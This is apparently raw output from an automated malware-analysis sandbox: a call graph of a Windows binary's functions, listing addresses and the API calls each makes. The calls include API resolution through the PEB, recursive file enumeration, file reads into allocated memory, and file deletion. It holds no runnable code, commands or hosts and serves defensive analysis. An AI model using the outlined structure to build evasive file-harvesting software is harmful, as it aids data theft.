9227->9228 9229 403642 9228->9229 9229->9200 9231 4031e5 4 API calls 9230->9231 9232 40365c 9231->9232 9232->9198 9833 40f252 9834 404bee 6 API calls 9833->9834 9835 40f269 9834->9835 9836 404bee 6 API calls 9835->9836 9847 40f2ff 9835->9847 9837 40f282 9836->9837 9838 404bee 6 API calls 9837->9838 9839 40f290 9838->9839 9850 404c4e 9839->9850 9841 40f2a7 9842 405872 4 API calls 9841->9842 9841->9847 9843 40f2cd 9842->9843 9844 405872 4 API calls 9843->9844 9845 40f2dc 9844->9845 9846 405872 4 API calls 9845->9846 9848 40f2ee 9846->9848 9849 405762 4 API calls 9848->9849 9849->9847 9851 402b7c 2 API calls 9850->9851 9853 404c60 9851->9853 9852 404ca4 9852->9841 9853->9852 9854 4031e5 4 API calls 9853->9854 9855 404c8d 9854->9855 9855->9852 9856 402bab 2 API calls 9855->9856 9856->9852 9857 41045c 9858 4040bb 12 API calls 9857->9858 9859 410477 9858->9859 9860 41060b 9859->9860 9888 407851 9859->9888 9862 41048f 9864 407851 2 API calls 9862->9864 9868 410604 9862->9868 9863 403f9e 5 API calls 9863->9860 9865 4104a9 9864->9865 9870 4105e0 9865->9870 9871 405ae9 6 API calls 9865->9871 9873 41056f 9865->9873 9874 4105eb 9865->9874 9866 402bab 2 API calls 9866->9868 9867 402bab 2 API calls 9869 4105fb 9867->9869 9868->9863 9869->9866 9872 402bab 2 API calls 9870->9872 9870->9874 9871->9865 9872->9874 9873->9870 9875 4105d6 9873->9875 9877 412269 6 API calls 9873->9877 9874->9867 9874->9869 9876 402bab 2 API calls 9875->9876 9876->9870 9878 410580 9877->9878 9878->9875 9879 405872 4 API calls 9878->9879 9880 410599 9879->9880 9881 405872 4 API calls 9880->9881 9882 4105a9 9881->9882 9883 405872 4 API calls 9882->9883 9884 4105bb 9883->9884 9885 405872 4 API calls 9884->9885 9886 4105cd 9885->9886 9887 402bab 2 API calls 9886->9887 9887->9875 9889 407866 9888->9889 9890 402b7c 2 API calls 9889->9890 9891 407899 9889->9891 9890->9891 9891->9862 9294 40f561 9297 40f4b6 9294->9297 9298 413b28 6 API calls 9297->9298 9299 40f4bf 9298->9299 9300 405b6f 6 API calls 9299->9300 9301 402bab GetProcessHeap HeapFree 9299->9301 9302 413a58 13 API calls 9299->9302 9303 40f559 9299->9303 9300->9299 9301->9299 9302->9299 9307 403b64 9308 4031e5 4 API calls 9307->9308 9309 403b77 PathFileExistsW 9308->9309 9923 40d069 9924 404bee 6 API calls 9923->9924 9925 40d080 9924->9925 9926 404bee 6 API calls 9925->9926 9948 40d1e2 9925->9948 9927 40d099 9926->9927 9928 404bee 6 API calls 9927->9928 9929 40d0a7 9928->9929 9964 404ba7 9929->9964 9932 404bee 6 API calls 9933 40d0c5 9932->9933 9934 404c4e 6 API calls 9933->9934 9935 40d0dc 9934->9935 9936 404bee 6 API calls 9935->9936 9937 40d0eb 9936->9937 9938 404ba7 4 API calls 9937->9938 9939 40d0fa 9938->9939 9940 404bee 6 API calls 9939->9940 9941 40d109 9940->9941 9942 404c4e 6 API calls 9941->9942 9943 40d123 9942->9943 9944 405872 4 API calls 9943->9944 9943->9948 9945 40d14a 9944->9945 9946 405872 4 API calls 9945->9946 9947 40d159 9946->9947 9949 405872 4 API calls 9947->9949 9950 40d16b 9949->9950 9951 405781 4 API calls 9950->9951 9952 40d179 9951->9952 9953 405872 4 API calls 9952->9953 9954 40d18b 9953->9954 9955 405762 4 API calls 9954->9955 9956 40d19f 9955->9956 9957 405872 4 API calls 9956->9957 9958 40d1b1 9957->9958 9959 405781 4 API calls 9958->9959 9960 40d1bf 9959->9960 9961 405872 4 API calls 9960->9961 9962 40d1d1 9961->9962 9963 405762 4 API calls 9962->9963 9963->9948 9965 4031e5 4 API calls 9964->9965 9966 404bca 9965->9966 9966->9932 9336 40f16e 9337 4056bf 2 API calls 9336->9337 9338 40f17b 9337->9338 9339 412093 20 API calls 9338->9339 9340 40f19e 9339->9340 9341 412093 20 API calls 9340->9341 9342 40f1b6 9341->9342 9343 412093 20 API calls 9342->9343 9344 40f1cc 9343->9344 9345 412093 20 API calls 9344->9345 9346 40f1e2 9345->9346 9347 413aca 4 API calls 9346->9347 9348 40f1ef 9347->9348 9349 405695 2 API calls 9348->9349 9350 40f1fa 9349->9350 9351 40ce71 9352 413b28 6 API calls 9351->9352 9353 40ce78 9352->9353 9354 405b6f 6 API calls 9353->9354 9355 40ce83 9354->9355 9359 40ceba 9355->9359 9362 403d74 19 API calls 9355->9362 9363 40cec1 9355->9363 9356 403fbf 7 API calls 9357 40cecc 9356->9357 9358 40cefb 9357->9358 9361 403d74 19 API calls 9357->9361 9360 402bab 2 API calls 9359->9360 9360->9363 9364 40cee7 9361->9364 9365 40cead 9362->9365 9363->9356 9366 40cef4 9364->9366 9369 402bab 2 API calls 9364->9369 9365->9359 9368 402bab 2 API calls 9365->9368 9367 402bab 2 API calls 9366->9367 9367->9358 9368->9359 9369->9366 9370 406472 9371 4031e5 4 API calls 9370->9371 9372 406484 Sleep 9371->9372 10040 40f204 10041 405781 4 API calls 10040->10041 10042 40f214 10041->10042 10043 4057df 13 API calls 10042->10043 10044 40f226 10043->10044 9430 403c08 9431 4031e5 4 API calls 9430->9431 9432 403c1a DeleteFileW 9431->9432 9433 410a09 9434 41219c 14 API calls 9433->9434 9435 410a1b 9434->9435 9436 41219c 14 API calls 9435->9436 9437 410a23 9436->9437 9438 41219c 14 API calls 9437->9438 9439 410a2c 9438->9439 9440 41219c 14 API calls 9439->9440 9441 410a38 9440->9441 9442 404b22 6 API calls 9441->9442 9443 410a4c 9442->9443 9444 403fbf 7 API calls 9443->9444 9450 410a7a 9443->9450 9445 410a5c 9444->9445 9446 410a71 9445->9446 9447 413a58 13 API calls 9445->9447 9448 402bab 2 API calls 9446->9448 9449 410a6b 9447->9449 9448->9450 9451 402bab 2 API calls 9449->9451 9451->9446 10045 410d09 10046 410d56 10045->10046 10047 410d17 10045->10047 10049 413a58 13 API calls 10046->10049 10061 406642 10047->10061 10051 410d6f 10049->10051 10052 4056bf 2 API calls 10053 410d2e 10052->10053 10074 405641 10053->10074 10055 410d41 10056 413aca 4 API calls 10055->10056 10057 410d4a 10056->10057 10058 405695 2 API calls 10057->10058 10059 410d50 10058->10059 10060 4036a3 4 API calls 10059->10060 10060->10046 10062 406662 10061->10062 10063 4031e5 4 API calls 10062->10063 10064 406676 10063->10064 10078 4066bf 10064->10078 10069 4066b1 10072 4036a3 4 API calls 10069->10072 10070 4066a7 10071 4036a3 4 API calls 10070->10071 10073 4066ac 10071->10073 10072->10073 10073->10046 10073->10052 10075 40564d 10074->10075 10076 405673 10074->10076 10075->10076 10077 4056fc 4 API calls 10075->10077 10076->10055 10077->10076 10079 4031e5 4 API calls 10078->10079 10080 4066dc 10079->10080 10081 4066f6 SetLastError 10080->10081 10082 406708 GetLastError 10080->10082 10099 406693 10081->10099 10083 406713 10082->10083 10082->10099 10084 4031e5 4 API calls 10083->10084 10085 406725 10084->10085 10086 4031e5 4 API calls 10085->10086 10085->10099 10087 40673f 10086->10087 10088 406753 10087->10088 10089 406749 10087->10089 10091 4031e5 4 API calls 10088->10091 10090 4036a3 4 API calls 10089->10090 10090->10099 10092 406761 10091->10092 10093 40678a 10092->10093 10094 40677c 10092->10094 10096 4036a3 4 API calls 10093->10096 10095 4036a3 4 API calls 10094->10095 10097 406781 10095->10097 10096->10099 10098 4036a3 4 API calls 10097->10098 10098->10099 10100 406455 10099->10100 10101 4031e5 4 API calls 10100->10101 10102 406468 10101->10102 10102->10069 10102->10070 9452 40c509 9453 412093 20 API calls 9452->9453 9454 40c51e 9453->9454 9461 40910d 9462 404b22 6 API calls 9461->9462 9463 409124 9462->9463 9464 40917a 9463->9464 9465 405b6f 6 API calls 9463->9465 9466 40913e 9465->9466 9468 404b22 6 API calls 9466->9468 9472 409173 9466->9472 9467 402bab 2 API calls 9467->9464 9469 409153 9468->9469 9471 409408 15 API calls 9469->9471 9475 40916a 9469->9475 9470 402bab 2 API calls 9470->9472 9473 409164 9471->9473 9472->9467 9474 402bab 2 API calls 9473->9474 9474->9475 9475->9470 9479 410410 9480 4056bf 2 API calls 9479->9480 9481 41041b 9480->9481 9482 412093 20 API calls 9481->9482 9483 41043c 9482->9483 9484 413aca 4 API calls 9483->9484 9485 410449 9484->9485 9486 405695 2 API calls 9485->9486 9487 410454 9486->9487 9514 40c71a 9515 41219c 14 API calls 9514->9515 9516 40c728 9515->9516 10158 410b1a 10159 404bee 6 API calls 10158->10159 10161 410b31 10159->10161 10160 410c6d 10161->10160 10162 404bee 6 API calls 10161->10162 10163 410b5a 10162->10163 10164 404bee 6 API calls 10163->10164 10165 410b69 10164->10165 10166 404bee 6 API calls 10165->10166 10167 410b78 10166->10167 10168 404ba7 4 API calls 10167->10168 10169 410b86 10168->10169 10170 404ba7 4 API calls 10169->10170 10171 410b95 10170->10171 10171->10160 10172 405872 4 API calls 10171->10172 10173 410bd7 10172->10173 10174 405872 4 API calls 10173->10174 10175 410be8 10174->10175 10176 405872 4 API calls 10175->10176 10177 410bf9 10176->10177 10178 405781 4 API calls 10177->10178 10179 410c07 10178->10179 10180 405781 4 API calls 10179->10180 10184 410c15 10180->10184 10181 410c4e 10182 405762 4 API calls 10181->10182 10183 410c60 10182->10183 10183->10160 10185 403f9e 5 API calls 10183->10185 10184->10181 10191 405e5a 10184->10191 10185->10160 10188 4040bb 12 API calls 10189 410c44 10188->10189 10190 402bab 2 API calls 10189->10190 10190->10181 10192 402b7c 2 API calls 10191->10192 10193 405e72 10192->10193 10194 4031e5 4 API calls 10193->10194 10197 405ea3 10193->10197 10195 405e94 10194->10195 10196 402bab 2 API calls 10195->10196 10195->10197 10196->10197 10197->10181 10197->10188 10198 40f81c 10199 404bee 6 API calls 10198->10199 10200 40f833 10199->10200 10201 404bee 6 API calls 10200->10201 10215 40f94f 10200->10215 10202 40f85c 10201->10202 10203 404bee 6 API calls 10202->10203 10204 40f86b 10203->10204 10205 404bee 6 API calls 10204->10205 10206 40f87a 10205->10206 10207 404bee 6 API calls 10206->10207 10208 40f888 10207->10208 10209 404ba7 4 API calls 10208->10209 10210 40f897 10209->10210 10211 405872 4 API calls 10210->10211 10210->10215 10212 40f8d8 10211->10212 10213 405872 4 API calls 10212->10213 10214 40f8ea 10213->10214 10216 405872 4 API calls 10214->10216 10217 40f8fa 10216->10217 10218 405872 4 API calls 10217->10218 10219 40f90c 10218->10219 10220 405781 4 API calls 10219->10220 10221 40f91d 10220->10221 10222 4040bb 12 API calls 10221->10222 10223 40f92d 10222->10223 10224 405762 4 API calls 10223->10224 10225 40f93f 10224->10225 10225->10215 10226 403f9e 5 API calls 10225->10226 10226->10215 9529 402c1f 9530 4031e5 4 API calls 9529->9530 9531 402c31 LoadLibraryW 9530->9531 10236 407e1f 10237 407e2c 10236->10237 10240 407e61 10236->10240 10241 407e3e 10237->10241 10243 402bab 2 API calls 10237->10243 10245 407e51 10237->10245 10238 407eb6 10238->10245 10246 402bab 2 API calls 10238->10246 10239 407ed4 10240->10238 10247 405872 4 API calls 10240->10247 10253 407ea6 10240->10253 10241->10239 10244 402bab 2 API calls 10241->10244 10242 402bab 2 API calls 10242->10238 10243->10241 10244->10245 10245->10239 10248 402bab 2 API calls 10245->10248 10246->10245 10249 407e86 10247->10249 10248->10239 10250 405872 4 API calls 10249->10250 10251 407e96 10250->10251 10252 405872 4 API calls 10251->10252 10252->10253 10253->10238 10253->10242 9544 405924 9545 4031e5 4 API calls 9544->9545 9546 405937 StrStrW 9545->9546 10262 410927 10263 4044ee 7 API calls 10262->10263 10264 41093d 10263->10264 10265 4109a4 10264->10265 10266 4056bf 2 API calls 10264->10266 10269 410954 10266->10269 10267 4044ee 7 API calls 10267->10269 10269->10267 10270 410990 10269->10270 10271 402bab 2 API calls 10269->10271 10277 41080e 10269->10277 10272 413aca 4 API calls 10270->10272 10271->10269 10273 410998 10272->10273 10274 405695 2 API calls 10273->10274 10275 41099e 10274->10275 10276 402bab 2 API calls 10275->10276 10276->10265 10278 410821 10277->10278 10288 41091f 10278->10288 10289 410701 10278->10289 10281 405872 4 API calls 10282 410900 10281->10282 10283 405872 4 API calls 10282->10283 10284 41090d 10283->10284 10285 405872 4 API calls 10284->10285 10286 410919 10285->10286 10287 402bab 2 API calls 10286->10287 10287->10288 10288->10269 10290 405f08 4 API calls 10289->10290 10292 410713 10290->10292 10291 410804 10291->10281 10291->10288 10292->10291 10293 402b7c 2 API calls 10292->10293 10294 410748 10293->10294 10296 402b7c 2 API calls 10294->10296 10298 4107fd 10294->10298 10295 402bab 2 API calls 10295->10291 10299 4107ad 10296->10299 10297 402bab 2 API calls 10297->10298 10298->10295 10299->10297 10300 40d726 10301 404bee 6 API calls 10300->10301 10302 40d73f 10301->10302 10303 40db63 10302->10303 10304 405872 4 API calls 10302->10304 10307 40d761 10304->10307 10305 404bee 6 API calls 10305->10307 10306 405872 4 API calls 10306->10307 10307->10305 10307->10306 10309 40d971 10307->10309 10308 404ba7 4 API calls 10308->10309 10309->10308 10310 405781 4 API calls 10309->10310 10314 40d9bb 10309->10314 10310->10309 10311 404c4e 6 API calls 10311->10314 10312 405781 4 API calls 10312->10314 10313 4037be 4 API calls 10313->10314 10314->10303 10314->10311 10314->10312 10314->10313 10315 405872 4 API calls 10314->10315 10315->10314 9602 40f12f 9603 41219c 14 API calls 9602->9603 9604 40f13f 9603->9604 9605 41219c 14 API calls 9604->9605 9606 40f14c 9605->9606 9607 41219c 14 API calls 9606->9607 9608 40f159 9607->9608 9609 41219c 14 API calls 9608->9609 9610 40f166 9609->9610 9617 40ed35 9618 4056bf 2 API calls 9617->9618 9619 40ed42 9618->9619 9620 412093 20 API calls 9619->9620 9621 40ed63 9620->9621 9622 412093 20 API calls 9621->9622 9623 40ed73 9622->9623 9624 413aca 4 API calls 9623->9624 9625 40ed80 9624->9625 9626 405695 2 API calls 9625->9626 9627 40ed8e 9626->9627 8071 40f3c5 8076 41219c 8071->8076 8074 41219c 14 API calls 8075 40f3e1 8074->8075 8077 4121b1 8076->8077 8093 40f3d3 8076->8093 8078 4121be 8077->8078 8082 4121c5 8077->8082 8124 413ba4 8078->8124 8080 4121ca 8094 404056 8080->8094 8082->8080 8087 412210 8082->8087 8083 4121c3 8083->8093 8101 405b6f 8083->8101 8086 41224d 8091 402bab 2 API calls 8086->8091 8086->8093 8087->8093 8129 403fbf 8087->8129 8091->8093 8093->8074 8140 402b7c GetProcessHeap RtlAllocateHeap 8094->8140 8096 404066 8098 404095 8096->8098 8142 4031e5 8096->8142 8098->8083 8100 402bab 2 API calls 8100->8098 8102 405b7d 8101->8102 8103 402b7c 2 API calls 8102->8103 8104 405b99 8103->8104 8113 405c02 8104->8113 8178 4059b8 8104->8178 8106 405c09 8108 402bab 2 API calls 8106->8108 8107 405bba 8107->8106 8109 402b7c 2 API calls 8107->8109 8108->8113 8110 405bdd 8109->8110 8110->8106 8111 405be4 8110->8111 8112 402bab 2 API calls 8111->8112 8112->8113 8113->8086 8114 413a58 8113->8114 8115 413a63 8114->8115 8123 412245 8114->8123 8115->8123 8181 405781 8115->8181 8118 405781 4 API calls 8119 413aa0 8118->8119 8184 4057df 8119->8184 8122 405781 4 API calls 8122->8123 8137 402bab 8123->8137 8125 413bad 8124->8125 8126 404056 6 API calls 8125->8126 8128 413bb8 8125->8128 8127 413bc5 8126->8127 8127->8083 8128->8083 8130 402b7c 2 API calls 8129->8130 8131 403fcf 8130->8131 8136 403ff4 8131->8136 8303 403b98 8131->8303 8134 403ff8 GetLastError 8135 402bab 2 API calls 8134->8135 8135->8136 8136->8083 8138 402bb4 GetProcessHeap HeapFree 8137->8138 8139 402bc6 8137->8139 8138->8139 8139->8086 8141 402b98 8140->8141 8141->8096 8143 4031f3 8142->8143 8144 403236 8142->8144 8143->8144 8147 403208 8143->8147 8153 4030a5 8144->8153 8146 403224 8149 403258 8146->8149 8151 4031e5 4 API calls 8146->8151 8159 403263 8147->8159 8149->8098 8149->8100 8150 40320d 8150->8149 8152 4030a5 4 API calls 8150->8152 8151->8149 8152->8146 8165 402ca4 8153->8165 8155 4030b0 8156 4030b5 8155->8156 8169 4030c4 8155->8169 8156->8146 8160 40326d 8159->8160 8161 402b7c 2 API calls 8160->8161 8164 4032b7 8160->8164 8162 40328c 8161->8162 8163 402b7c 2 API calls 8162->8163 8163->8164 8164->8150 8166 403079 8165->8166 8167 40307c 8166->8167 8173 40317b GetPEB 8166->8173 8167->8155 8171 4030eb 8169->8171 8170 4030c0 8170->8146 8171->8170 8175 402c03 8171->8175 8174 40319b 8173->8174 8174->8167 8176 4031e5 3 API calls 8175->8176 8177 402c15 GetProcAddress 8176->8177 8177->8170 8179 4031e5 4 API calls 8178->8179 8180 4059cb 8179->8180 8180->8107 8199 405797 8181->8199 8183 405792 8183->8118 8185 405832 8184->8185 8186 4057eb 8184->8186 8185->8122 8185->8123 8186->8185 8209 4040bb 8186->8209 8189 405839 8191 405853 8189->8191 8236 405627 8189->8236 8190 40582c 8233 403f9e 8190->8233 8247 405762 8191->8247 8197 403f9e 5 API calls 8197->8185 8200 4057a1 8199->8200 8201 4057bd 8199->8201 8200->8201 8203 4056fc 8200->8203 8201->8183 8204 405714 8203->8204 8205 402b7c 2 API calls 8204->8205 8206 405730 8205->8206 8207 402bab 2 API calls 8206->8207 8208 405752 8206->8208 8207->8208 8208->8201 8210 4031e5 4 API calls 8209->8210 8211 4040d5 CreateFileW 8210->8211 8212 4040f8 8211->8212 8213 40418d 8211->8213 8214 4031e5 4 API calls 8212->8214 8215 404183 8213->8215 8253 403c90 8213->8253 8221 404105 8214->8221 8215->8185 8215->8189 8215->8190 8218 40416d 8250 403c40 8218->8250 8221->8218 8225 4031e5 4 API calls 8221->8225 8223 4040bb 9 API calls 8226 4041c8 8223->8226 8224 402bab 2 API calls 8224->8215 8227 404131 VirtualAlloc 8225->8227 8226->8224 8227->8218 8228 404142 8227->8228 8229 4031e5 4 API calls 8228->8229 8230 40414f ReadFile 8229->8230 8230->8218 8231 404160 8230->8231 8232 4031e5 4 API calls 8231->8232 8232->8218 8234 4031e5 4 API calls 8233->8234 8235 403fb1 VirtualFree 8234->8235 8235->8185 8237 4031e5 4 API calls 8236->8237 8238 40563a 8237->8238 8239 405872 8238->8239 8241 405881 8239->8241 8240 4058bc 8243 405797 4 API calls 8240->8243 8244 4058af 8240->8244 8241->8240 8300 4058d4 8241->8300 8243->8244 8244->8191 8246 405781 4 API calls 8246->8240 8248 405781 4 API calls 8247->8248 8249 405770 8248->8249 8249->8197 8251 4031e5 4 API calls 8250->8251 8252 403c52 FindCloseChangeNotification 8251->8252 8252->8215 8254 403ca3 8253->8254 8257 403caa 8253->8257 8280 405dc5 8254->8280 8256 404056 6 API calls 8258 403cbe 8256->8258 8257->8256 8259 403d3a 8257->8259 8260 403d2e 8258->8260 8261 403d17 8258->8261 8262 403ccf 8258->8262 8259->8215 8276 403c59 8259->8276 8260->8259 8263 402bab 2 API calls 8260->8263 8264 405b6f 6 API calls 8261->8264 8265 405b6f 6 API calls 8262->8265 8263->8259 8267 403d14 8264->8267 8266 403cdd 8265->8266 8268 405b6f 6 API calls 8266->8268 8269 402bab 2 API calls 8267->8269 8270 403cee 8268->8270 8269->8260 8270->8267 8285 403d4d 8270->8285 8273 403d0b 8275 402bab 2 API calls 8273->8275 8275->8267 8277 403c21 8276->8277 8278 4031e5 4 API calls 8277->8278 8279 403c33 8278->8279 8279->8223 8279->8226 8294 406799 8280->8294 8282 405dd5 8283 402b7c 2 API calls 8282->8283 8284 405dfe 8283->8284 8284->8257 8297 403bb7 8285->8297 8287 403cfe 8287->8273 8288 403c62 8287->8288 8289 403d4d 5 API calls 8288->8289 8290 403c6d 8289->8290 8291 403c72 8290->8291 8292 4031e5 4 API calls 8290->8292 8291->8273 8293 403c87 CreateDirectoryW 8292->8293 8293->8273 8295 4031e5 4 API calls 8294->8295 8296 4067ad 8295->8296 8296->8282 8298 4031e5 4 API calls 8297->8298 8299 403bc9 GetFileAttributesW 8298->8299 8299->8287 8301 405797 4 API calls 8300->8301 8302 4058a8 8301->8302 8302->8244 8302->8246 8304 4031e5 4 API calls 8303->8304 8305 403baa 8304->8305 8305->8134 8305->8136 9742 40ebc6 9743 4040bb 12 API calls 9742->9743 9744 40ebdf 9743->9744 9745 40ecd7 9744->9745 9762 407795 9744->9762 9748 40eccd 9750 403f9e 5 API calls 9748->9750 9749 4056bf 2 API calls 9760 40ec12 9749->9760 9750->9745 9751 40ecb5 9752 402bab 2 API calls 9751->9752 9753 40ecbd 9752->9753 9754 413aca 4 API calls 9753->9754 9755 40ecc7 9754->9755 9757 405695 2 API calls 9755->9757 9756 407908 GetProcessHeap RtlAllocateHeap 9756->9760 9757->9748 9758 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9758->9760 9760->9751 9760->9756 9760->9758 9761 402bab GetProcessHeap HeapFree 9760->9761 9773 412269 9760->9773 9761->9760 9764 4077ab 9762->9764 9763 4077b3 9763->9748 9763->9749 9764->9763 9780 405ae9 9764->9780 9766 4077e1 9766->9763 9767 407802 9766->9767 9768 4077f8 9766->9768 9770 402b7c 2 API calls 9767->9770 9769 402bab 2 API calls 9768->9769 9769->9763 9771 407811 9770->9771 9772 402bab 2 API calls 9771->9772 9772->9763 9796 40374e 9773->9796 9776 412299 9776->9760 9779 402bab 2 API calls 9779->9776 9781 405af7 9780->9781 9782 402b7c 2 API calls 9781->9782 9783 405b03 9782->9783 9792 405b5a 9783->9792 9793 405998 9783->9793 9785 405b21 9786 405b61 9785->9786 9787 402b7c 2 API calls 9785->9787 9788 402bab 2 API calls 9786->9788 9789 405b39 9787->9789 9788->9792 9789->9786 9790 405b40 9789->9790 9791 402bab 2 API calls 9790->9791 9791->9792 9792->9766 9794 4031e5 4 API calls 9793->9794 9795 4059ab 9794->9795 9795->9785 9797 402b7c 2 API calls 9796->9797 9798 40375f 9797->9798 9799 4031e5 4 API calls 9798->9799 9802 4037a3 9798->9802 9800 40378f 9799->9800 9801 402bab 2 API calls 9800->9801 9800->9802 9801->9802 9802->9776 9803 4037be 9802->9803 9804 4031e5 4 API calls 9803->9804 9805 4037e2 9804->9805 9806 40382b 9805->9806 9807 402b7c 2 API calls 9805->9807 9806->9779 9808 403802 9807->9808 9809 403832 9808->9809 9811 403809 9808->9811 9810 4036a3 4 API calls 9809->9810 9810->9806 9812 4036a3 4 API calls 9811->9812 9812->9806 8903 410cd1 8908 412093 8903->8908 8906 412093 20 API calls 8907 410cff 8906->8907 8910 4120a5 8908->8910 8929 410cf1 8908->8929 8909 4120b3 8911 404056 6 API calls 8909->8911 8910->8909 8914 412100 8910->8914 8912 4120ba 8911->8912 8913 405b6f 6 API calls 8912->8913 8915 412152 8912->8915 8912->8929 8916 412125 8913->8916 8918 403fbf 7 API calls 8914->8918 8914->8929 8930 403d74 8915->8930 8916->8915 8921 412139 8916->8921 8922 41214d 8916->8922 8918->8912 8920 41218c 8926 402bab 2 API calls 8920->8926 8920->8929 8925 402bab 2 API calls 8921->8925 8924 402bab 2 API calls 8922->8924 8923 402bab 2 API calls 8923->8920 8924->8915 8927 41213e 8925->8927 8926->8929 8928 402bab 2 API calls 8927->8928 8928->8929 8929->8906 8931 403d87 8930->8931 8932 403ea3 8931->8932 8933 405b6f 6 API calls 8931->8933 8934 405b6f 6 API calls 8932->8934 8935 403da3 8933->8935 8936 403eb9 8934->8936 8935->8932 8937 4031e5 4 API calls 8935->8937 8938 4031e5 4 API calls 8936->8938 8945 403f6f 8936->8945 8939 403dbc FindFirstFileW 8937->8939 8940 403ed3 FindFirstFileW 8938->8940 8952 403e9c 8939->8952 8961 403dd1 8939->8961 8944 403ee8 8940->8944 8959 403f8d 8940->8959 8941 402bab 2 API calls 8941->8945 8942 402bab 2 API calls 8942->8932 8943 4031e5 4 API calls 8946 403e84 FindNextFileW 8943->8946 8949 405b6f 6 API calls 8944->8949 8950 4031e5 4 API calls 8944->8950 8955 403f75 8944->8955 8963 402bab 2 API calls 8944->8963 8973 40fa23 8944->8973 8945->8920 8945->8923 8947 403e96 8946->8947 8946->8961 8970 403bef 8947->8970 8949->8944 8951 403f50 FindNextFileW 8950->8951 8951->8944 8954 403f87 8951->8954 8952->8942 8953 405b6f 6 API calls 8953->8961 8956 403bef 5 API calls 8954->8956 8957 402bab 2 API calls 8955->8957 8956->8959 8960 403f7b 8957->8960 8958 403d74 15 API calls 8958->8961 8959->8941 8962 403bef 5 API calls 8960->8962 8961->8943 8961->8953 8961->8958 8964 402bab 2 API calls 8961->8964 8965 403f63 8961->8965 8962->8945 8963->8944 8964->8961 8966 402bab 2 API calls 8965->8966 8967 403f69 8966->8967 8968 403bef 5 API calls 8967->8968 8968->8945 8971 4031e5 4 API calls 8970->8971 8972 403c01 FindClose 8971->8972 8972->8952 8974 40fa39 8973->8974 8975 410293 8974->8975 8976 405b6f 6 API calls 8974->8976 8975->8944 8977 40ffcc 8976->8977 8977->8975 8978 4040bb 12 API calls 8977->8978 8979 40ffeb 8978->8979 8980 41028c 8979->8980 8983 402b7c 2 API calls 8979->8983 9028 41027d 8979->9028 8981 402bab 2 API calls 8980->8981 8981->8975 8982 403f9e 5 API calls 8982->8980 8984 41001e 8983->8984 8985 40a423 4 API calls 8984->8985 8984->9028 8986 41004a 8985->8986 8987 4031e5 4 API calls 8986->8987 8988 41005c 8987->8988 8989 4031e5 4 API calls 8988->8989 8990 410079 8989->8990 8991 4031e5 4 API calls 8990->8991 8992 410096 8991->8992 8993 4031e5 4 API calls 8992->8993 8994 4100b0 8993->8994 8995 4031e5 4 API calls 8994->8995 8996 4100cd 8995->8996 8997 4031e5 4 API calls 8996->8997 8998 4100ea 8997->8998 9029 412516 8998->9029 9000 4100fd 9001 40642c 5 API calls 9000->9001 9002 41013e 9001->9002 9003 410142 9002->9003 9004 41019f 9002->9004 9005 40488c 5 API calls 9003->9005 9007 4031e5 4 API calls 9004->9007 9006 410151 9005->9006 9009 41019c 9006->9009 9010 404866 4 API calls 9006->9010 9021 4101bb 9007->9021 9008 41022a 9018 413a58 13 API calls 9008->9018 9009->9008 9011 40642c 5 API calls 9009->9011 9012 410163 9010->9012 9013 410201 9011->9013 9017 406c4c 6 API calls 9012->9017 9026 41018e 9012->9026 9015 410205 9013->9015 9016 41022f 9013->9016 9014 403c40 5 API calls 9014->9009 9019 4126a7 7 API calls 9015->9019 9032 4125db 9016->9032 9022 410178 9017->9022 9023 41026e 9018->9023 9019->9008 9024 4031e5 4 API calls 9021->9024 9025 406c4c 6 API calls 9022->9025 9027 402bab 2 API calls 9023->9027 9024->9009 9025->9026 9026->9014 9027->9028 9028->8982 9030 4031e5 4 API calls 9029->9030 9031 412539 9030->9031 9031->9000 9033 40488c 5 API calls 9032->9033 9034 4125ec 9033->9034 9035 41269f 9034->9035 9036 4031e5 4 API calls 9034->9036 9035->9008 9037 412609 9036->9037 9039 4031e5 4 API calls 9037->9039 9044 41268f 9037->9044 9038 403c40 5 API calls 9038->9035 9040 41262a 9039->9040 9048 412675 9040->9048 9049 4124f1 9040->9049 9042 4031e5 4 API calls 9042->9044 9044->9038 9045 412663 9047 4031e5 4 API calls 9045->9047 9046 4124f1 4 API calls 9046->9045 9047->9048 9048->9042 9050 4031e5 4 API calls 9049->9050 9051 412503 9050->9051 9051->9045 9051->9046 9238 4049dc 9239 4031e5 4 API calls 9238->9239 9240 4049ef 9239->9240 9895 40cddd 9896 405b6f 6 API calls 9895->9896 9897 40cdee 9896->9897 9898 40ce06 9897->9898 9899 413a58 13 API calls 9897->9899 9900 405b6f 6 API calls 9898->9900 9907 40ce59 9898->9907 9901 40ce00 9899->9901 9903 40ce1c 9900->9903 9902 402bab 2 API calls 9901->9902 9902->9898 9904 403d74 19 API calls 9903->9904 9903->9907 9909 40ce52 9903->9909 9906 40ce45 9904->9906 9905 402bab 2 API calls 9905->9907 9908 402bab 2 API calls 9906->9908 9906->9909 9908->9909 9909->9905 9241 40ecde 9242 412093 20 API calls 9241->9242 9243 40ecfd 9242->9243 9244 412093 20 API calls 9243->9244 9245 40ed0d 9244->9245 9249 40e8df 9250 412093 20 API calls 9249->9250 9251 40e8f8 9250->9251 9252 412093 20 API calls 9251->9252 9253 40e908 9252->9253 9260 404b22 9253->9260 9255 40e91c 9256 40e936 9255->9256 9259 40e93d 9255->9259 9267 40e944 9255->9267 9258 402bab 2 API calls 9256->9258 9258->9259 9261 402b7c 2 API calls 9260->9261 9262 404b33 9261->9262 9266 404b66 9262->9266 9276 4049b3 9262->9276 9265 402bab 2 API calls 9265->9266 9266->9255 9268 4056bf 2 API calls 9267->9268 9269 40e952 9268->9269 9270 40e976 9269->9270 9271 4057df 13 API calls 9269->9271 9270->9256 9272 40e966 9271->9272 9273 413aca 4 API calls 9272->9273 9274 40e970 9273->9274 9275 405695 2 API calls 9274->9275 9275->9270 9277 4031e5 4 API calls 9276->9277 9278 4049c6 9277->9278 9278->9265 9278->9266 9279 4139de 9288 413855 9279->9288 9281 4139f1 9282 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9281->9282 9283 4139f7 9282->9283 9284 413866 59 API calls 9283->9284 9285 413a2d 9284->9285 9286 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9285->9286 9287 413a34 9286->9287 9289 4031e5 4 API calls 9288->9289 9290 413864 9289->9290 9290->9290 9915 4116e7 9916 4117ba 9915->9916 9917 4117f1 9916->9917 9918 405b6f 6 API calls 9916->9918 9919 4117d0 9918->9919 9919->9917 9920 404cbf 8 API calls 9919->9920 9921 4117eb 9920->9921 9922 402bab 2 API calls 9921->9922 9922->9917 9310 4094e7 9311 